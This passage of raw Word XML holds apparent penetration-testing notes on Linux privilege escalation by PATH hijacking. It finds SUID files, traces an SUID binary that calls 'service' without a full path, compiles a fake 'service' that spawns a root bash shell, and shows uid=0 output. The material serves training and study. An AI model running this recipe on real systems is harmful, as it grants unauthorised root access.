          <w:numId w:val="755"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a program tries to execute another program, but only specifies the program name, rather than its full (absolute) path, the shell will search the PATH directories until it is found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="755"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since a user has full control over their PATH variable, we can tell the shell to first look for programs in a directory we can write to.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Vulnerable Programs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a program tries to execute another program, the name of that program is likely embedded in the executable file as a string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can run strings on the executable file to find strings of characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use strace to see how the program is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another program called ltrace may also be of use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running strings against a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running strace against a command (alternative to strings):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strace -v -f -e execve &lt;command&gt; 2&gt;&amp;1 | grep exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running ltrace against a command (alternative to strings):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="965"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /usr/local/bin/suid-env </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the service program without a full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strace -v -f -e execve /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 14395] execve("/bin/sh", ["sh", "-c", "service apache2 start"],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002100">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("service apache2 start")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the service program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file service.c with the following contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002103">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002104">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002105">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002106">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pP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2107">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile service.c into a file called service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002108">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o service service.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepend the current directory (or where the new service executable is located) to the PATH variable, and execute the SUID file for a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=.:$PATH /usr/local/bin/suid-env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@debian:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root) …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
